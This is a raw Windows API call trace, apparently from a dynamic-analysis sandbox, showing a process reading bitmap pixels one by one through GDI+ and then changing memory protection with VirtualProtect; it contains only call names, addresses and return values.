[0164.375] GetLastError () returned 0x57
[0164.375] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.375] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.375] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=157, color=0x19de90) returned 0x0
[0164.375] GetLastError () returned 0x57
[0164.375] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.375] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.375] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=158, color=0x19de90) returned 0x0
[0164.375] GetLastError () returned 0x57
[0164.375] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.375] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.375] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=159, color=0x19de90) returned 0x0
[0164.375] GetLastError () returned 0x57
[0164.375] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.376] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.376] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=160, color=0x19de90) returned 0x0
[0164.376] GetLastError () returned 0x57
[0164.376] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.376] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.376] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=161, color=0x19de90) returned 0x0
[0164.376] GetLastError () returned 0x57
[0164.376] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.376] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.376] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=162, color=0x19de90) returned 0x0
[0164.376] GetLastError () returned 0x57
[0164.376] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.376] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.376] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=163, color=0x19de90) returned 0x0
[0164.376] GetLastError () returned 0x57
[0164.376] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.377] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.377] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=164, color=0x19de90) returned 0x0
[0164.377] GetLastError () returned 0x57
[0164.377] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.377] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.377] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=165, color=0x19de90) returned 0x0
[0164.377] GetLastError () returned 0x57
[0164.377] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.377] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.377] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=166, color=0x19de90) returned 0x0
[0164.377] GetLastError () returned 0x57
[0164.377] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.377] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.377] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=167, color=0x19de90) returned 0x0
[0164.377] GetLastError () returned 0x57
[0164.377] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.377] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.377] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=168, color=0x19de90) returned 0x0
[0164.377] GetLastError () returned 0x57
[0164.377] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.377] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.378] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=169, color=0x19de90) returned 0x0
[0164.378] GetLastError () returned 0x57
[0164.378] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.378] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.378] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=170, color=0x19de90) returned 0x0
[0164.378] GetLastError () returned 0x57
[0164.378] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.378] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.378] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=171, color=0x19de90) returned 0x0
[0164.378] GetLastError () returned 0x57
[0164.378] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.378] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.378] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=172, color=0x19de90) returned 0x0
[0164.378] GetLastError () returned 0x57
[0164.378] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.378] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.378] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=173, color=0x19de90) returned 0x0
[0164.378] GetLastError () returned 0x57
[0164.378] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.379] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.379] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=174, color=0x19de90) returned 0x0
[0164.379] GetLastError () returned 0x57
[0164.379] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.379] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.379] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=175, color=0x19de90) returned 0x0
[0164.379] GetLastError () returned 0x57
[0164.379] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.379] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.379] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=176, color=0x19de90) returned 0x0
[0164.379] GetLastError () returned 0x57
[0164.379] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.379] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.379] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=177, color=0x19de90) returned 0x0
[0164.379] GetLastError () returned 0x57
[0164.379] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.379] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.379] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=178, color=0x19de90) returned 0x0
[0164.379] GetLastError () returned 0x57
[0164.380] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.380] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.380] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=179, color=0x19de90) returned 0x0
[0164.380] GetLastError () returned 0x57
[0164.380] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.380] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.380] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=180, color=0x19de90) returned 0x0
[0164.380] GetLastError () returned 0x57
[0164.380] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.380] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.380] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=181, color=0x19de90) returned 0x0
[0164.380] GetLastError () returned 0x57
[0164.380] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.380] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.380] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=182, color=0x19de90) returned 0x0
[0164.380] GetLastError () returned 0x57
[0164.380] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.380] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.380] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=183, color=0x19de90) returned 0x0
[0164.380] GetLastError () returned 0x57
[0164.380] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.380] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.380] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=184, color=0x19de90) returned 0x0
[0164.380] GetLastError () returned 0x57
[0164.380] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.381] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.381] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=185, color=0x19de90) returned 0x0
[0164.381] GetLastError () returned 0x57
[0164.381] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.381] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.381] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=186, color=0x19de90) returned 0x0
[0164.381] GetLastError () returned 0x57
[0164.381] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.381] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.381] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=187, color=0x19de90) returned 0x0
[0164.381] GetLastError () returned 0x57
[0164.381] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.381] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.381] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=188, color=0x19de90) returned 0x0
[0164.381] GetLastError () returned 0x57
[0164.381] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.381] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.381] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=189, color=0x19de90) returned 0x0
[0164.381] GetLastError () returned 0x57
[0164.381] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.381] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.381] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=190, color=0x19de90) returned 0x0
[0164.381] GetLastError () returned 0x57
[0164.381] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.381] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.382] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=191, color=0x19de90) returned 0x0
[0164.382] GetLastError () returned 0x57
[0164.382] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.382] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.382] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=192, color=0x19de90) returned 0x0
[0164.382] GetLastError () returned 0x57
[0164.382] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.382] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.382] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=193, color=0x19de90) returned 0x0
[0164.382] GetLastError () returned 0x57
[0164.382] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.382] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.382] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=194, color=0x19de90) returned 0x0
[0164.382] GetLastError () returned 0x57
[0164.382] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.382] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.382] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=195, color=0x19de90) returned 0x0
[0164.382] GetLastError () returned 0x57
[0164.382] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.382] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.382] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=196, color=0x19de90) returned 0x0
[0164.382] GetLastError () returned 0x57
[0164.382] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.382] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.382] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=197, color=0x19de90) returned 0x0
[0164.382] GetLastError () returned 0x57
[0164.382] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.383] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.383] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=198, color=0x19de90) returned 0x0
[0164.383] GetLastError () returned 0x57
[0164.383] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.383] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.383] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=199, color=0x19de90) returned 0x0
[0164.383] GetLastError () returned 0x57
[0164.383] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.383] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.383] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=200, color=0x19de90) returned 0x0
[0164.383] GetLastError () returned 0x57
[0164.383] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.383] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.383] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=201, color=0x19de90) returned 0x0
[0164.383] GetLastError () returned 0x57
[0164.383] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.383] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.383] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=202, color=0x19de90) returned 0x0
[0164.383] GetLastError () returned 0x57
[0164.383] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.383] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.383] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=203, color=0x19de90) returned 0x0
[0164.383] GetLastError () returned 0x57
[0164.384] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.384] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.384] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=204, color=0x19de90) returned 0x0
[0164.384] GetLastError () returned 0x57
[0164.384] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.384] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.384] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=205, color=0x19de90) returned 0x0
[0164.384] GetLastError () returned 0x57
[0164.384] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.384] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.384] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=206, color=0x19de90) returned 0x0
[0164.384] GetLastError () returned 0x57
[0164.384] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.384] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.384] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=207, color=0x19de90) returned 0x0
[0164.384] GetLastError () returned 0x57
[0164.384] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.385] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.385] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=208, color=0x19de90) returned 0x0
[0164.385] GetLastError () returned 0x57
[0164.385] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.385] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.385] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=209, color=0x19de90) returned 0x0
[0164.385] GetLastError () returned 0x57
[0164.385] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.385] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.385] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=210, color=0x19de90) returned 0x0
[0164.385] GetLastError () returned 0x57
[0164.385] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.385] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.385] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=211, color=0x19de90) returned 0x0
[0164.385] GetLastError () returned 0x57
[0164.385] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.385] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.385] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=212, color=0x19de90) returned 0x0
[0164.385] GetLastError () returned 0x57
[0164.385] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.385] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.386] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=213, color=0x19de90) returned 0x0
[0164.386] GetLastError () returned 0x57
[0164.386] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.386] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.386] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=214, color=0x19de90) returned 0x0
[0164.386] GetLastError () returned 0x57
[0164.436] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.436] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.436] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=215, color=0x19de90) returned 0x0
[0164.436] GetLastError () returned 0x57
[0164.436] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.436] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.436] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=216, color=0x19de90) returned 0x0
[0164.436] GetLastError () returned 0x57
[0164.436] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.436] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.436] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=217, color=0x19de90) returned 0x0
[0164.436] GetLastError () returned 0x57
[0164.436] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.436] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.437] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=218, color=0x19de90) returned 0x0
[0164.437] GetLastError () returned 0x57
[0164.437] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.437] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.437] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=219, color=0x19de90) returned 0x0
[0164.437] GetLastError () returned 0x57
[0164.437] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.437] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.437] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=220, color=0x19de90) returned 0x0
[0164.437] GetLastError () returned 0x57
[0164.437] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.437] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.437] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=221, color=0x19de90) returned 0x0
[0164.437] GetLastError () returned 0x57
[0164.438] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.438] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.438] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=222, color=0x19de90) returned 0x0
[0164.438] GetLastError () returned 0x57
[0164.438] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.438] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.438] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=223, color=0x19de90) returned 0x0
[0164.438] GetLastError () returned 0x57
[0164.438] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.438] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.438] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=224, color=0x19de90) returned 0x0
[0164.438] GetLastError () returned 0x57
[0164.438] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.438] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.438] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=225, color=0x19de90) returned 0x0
[0164.438] GetLastError () returned 0x57
[0164.438] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.438] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.438] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=226, color=0x19de90) returned 0x0
[0164.438] GetLastError () returned 0x57
[0164.438] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.439] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.439] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=227, color=0x19de90) returned 0x0
[0164.439] GetLastError () returned 0x57
[0164.439] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.439] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.439] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=228, color=0x19de90) returned 0x0
[0164.439] GetLastError () returned 0x57
[0164.439] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.439] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.439] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=229, color=0x19de90) returned 0x0
[0164.439] GetLastError () returned 0x57
[0164.439] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.439] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.439] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=230, color=0x19de90) returned 0x0
[0164.439] GetLastError () returned 0x57
[0164.439] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.439] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.440] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=231, color=0x19de90) returned 0x0
[0164.440] GetLastError () returned 0x57
[0164.440] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.440] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.440] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=232, color=0x19de90) returned 0x0
[0164.440] GetLastError () returned 0x57
[0164.440] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.440] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.440] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=233, color=0x19de90) returned 0x0
[0164.440] GetLastError () returned 0x57
[0164.440] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.440] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.440] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=234, color=0x19de90) returned 0x0
[0164.440] GetLastError () returned 0x57
[0164.440] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.440] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.440] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=235, color=0x19de90) returned 0x0
[0164.440] GetLastError () returned 0x57
[0164.440] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.440] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.441] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=236, color=0x19de90) returned 0x0
[0164.441] GetLastError () returned 0x57
[0164.441] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.441] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.441] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=237, color=0x19de90) returned 0x0
[0164.441] GetLastError () returned 0x57
[0164.441] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.441] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.441] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=238, color=0x19de90) returned 0x0
[0164.441] GetLastError () returned 0x57
[0164.441] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.441] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.441] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=239, color=0x19de90) returned 0x0
[0164.441] GetLastError () returned 0x57
[0164.441] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.441] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.441] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=240, color=0x19de90) returned 0x0
[0164.442] GetLastError () returned 0x57
[0164.442] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.442] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.442] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=241, color=0x19de90) returned 0x0
[0164.442] GetLastError () returned 0x57
[0164.442] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.442] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.442] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=242, color=0x19de90) returned 0x0
[0164.442] GetLastError () returned 0x57
[0164.442] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.442] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.442] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=243, color=0x19de90) returned 0x0
[0164.442] GetLastError () returned 0x57
[0164.442] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.442] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.442] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=244, color=0x19de90) returned 0x0
[0164.442] GetLastError () returned 0x57
[0164.442] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.442] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.442] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=245, color=0x19de90) returned 0x0
[0164.443] GetLastError () returned 0x57
[0164.443] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.443] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.443] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=246, color=0x19de90) returned 0x0
[0164.443] GetLastError () returned 0x57
[0164.443] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.443] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.443] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=247, color=0x19de90) returned 0x0
[0164.443] GetLastError () returned 0x57
[0164.443] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=248, color=0x19de90) returned 0x0
[0164.443] GetLastError () returned 0x57
[0166.227] VirtualProtect (in: lpAddress=0x8c30178, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.252] VirtualProtect (in: lpAddress=0x8c301a0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.254] VirtualProtect (in: lpAddress=0x8c301c8, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.261] VirtualProtect (in: lpAddress=0x8cb4c5e, dwSize=0xb, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.265] VirtualProtect (in: lpAddress=0x8cb4c52, dwSize=0xb, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.265] VirtualProtect (in: lpAddress=0x8c30208, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.270] VirtualProtect (in: lpAddress=0x8c80780, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.275] VirtualProtect (in: lpAddress=0x8c807a4, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
